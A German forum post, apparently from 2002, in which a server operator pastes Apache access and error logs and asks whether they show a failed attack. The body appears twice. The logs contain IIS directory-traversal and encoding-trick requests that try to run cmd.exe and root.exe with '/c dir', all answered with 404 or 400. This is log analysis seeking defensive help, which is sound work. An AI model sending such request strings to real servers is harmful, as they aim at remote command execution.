hjn
24.06.02, 10:07
hallo zusammen
ich habe folgende einträge in meiner log datei gefungen.
ich gehe von einem angriff aus der nicht geklappt hat.
kann mir sonst noch jemand mehr darüber sagen.
auszug aus /var/log/httpd/...
ACCESS.LOG
195.251.9.38 - - [22/Jun/2002:12:47:43 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
195.251.9.38 - - [22/Jun/2002:12:47:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
195.251.9.38 - - [22/Jun/2002:12:47:44 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
195.251.9.38 - - [22/Jun/2002:12:47:44 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
195.251.9.38 - - [22/Jun/2002:12:47:45 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
195.251.9.38 - - [22/Jun/2002:12:47:45 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
195.251.9.38 - - [22/Jun/2002:12:47:46 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
195.251.9.38 - - [22/Jun/2002:12:47:46 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
195.251.9.38 - - [22/Jun/2002:12:47:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:47 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:47 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:48 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:48 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
195.251.9.38 - - [22/Jun/2002:12:47:49 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
195.251.9.38 - - [22/Jun/2002:12:47:49 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
195.251.9.38 - - [22/Jun/2002:12:47:50 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
ERROR_LOG
[Sat Jun 22 12:47:43 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/root.exe
[Sat Jun 22 12:47:44 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/MSADC/root.exe
[Sat Jun 22 12:47:44 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/c/winnt/system32/cmd.exe
[Sat Jun 22 12:47:44 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/d/winnt/system32/cmd.exe
[Sat Jun 22 12:47:45 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:45 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:46 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:46 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe
[Sat Jun 22 12:47:47 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..Á ../winnt/system32/cmd.exe
[Sat Jun 22 12:47:47 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..À¯../winnt/system32/cmd.exe
[Sat Jun 22 12:47:48 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..Á½../winnt/system32/cmd.exe
[Sat Jun 22 12:47:49 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:50 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..%2f../winnt/system32/cmd.exe
besten dank im voraus
ich habe folgende einträge in meiner log datei gefungen.
ich gehe von einem angriff aus der nicht geklappt hat.
kann mir sonst noch jemand mehr darüber sagen.
auszug aus /var/log/httpd/...
ACCESS.LOG
195.251.9.38 - - [22/Jun/2002:12:47:43 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
195.251.9.38 - - [22/Jun/2002:12:47:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
195.251.9.38 - - [22/Jun/2002:12:47:44 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
195.251.9.38 - - [22/Jun/2002:12:47:44 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
195.251.9.38 - - [22/Jun/2002:12:47:45 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
195.251.9.38 - - [22/Jun/2002:12:47:45 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
195.251.9.38 - - [22/Jun/2002:12:47:46 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
195.251.9.38 - - [22/Jun/2002:12:47:46 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
195.251.9.38 - - [22/Jun/2002:12:47:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:47 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:47 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:48 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
195.251.9.38 - - [22/Jun/2002:12:47:48 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
195.251.9.38 - - [22/Jun/2002:12:47:49 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
195.251.9.38 - - [22/Jun/2002:12:47:49 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
195.251.9.38 - - [22/Jun/2002:12:47:50 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
ERROR_LOG
[Sat Jun 22 12:47:43 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/root.exe
[Sat Jun 22 12:47:44 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/MSADC/root.exe
[Sat Jun 22 12:47:44 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/c/winnt/system32/cmd.exe
[Sat Jun 22 12:47:44 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/d/winnt/system32/cmd.exe
[Sat Jun 22 12:47:45 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:45 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:46 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:46 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe
[Sat Jun 22 12:47:47 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..Á ../winnt/system32/cmd.exe
[Sat Jun 22 12:47:47 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..À¯../winnt/system32/cmd.exe
[Sat Jun 22 12:47:48 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..Á½../winnt/system32/cmd.exe
[Sat Jun 22 12:47:49 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..%5c../winnt/system32/cmd.exe
[Sat Jun 22 12:47:50 2002] [error] [client 195.251.9.38] File does not exist: /home/daten/web/portal/scripts/..%2f../winnt/system32/cmd.exe
besten dank im voraus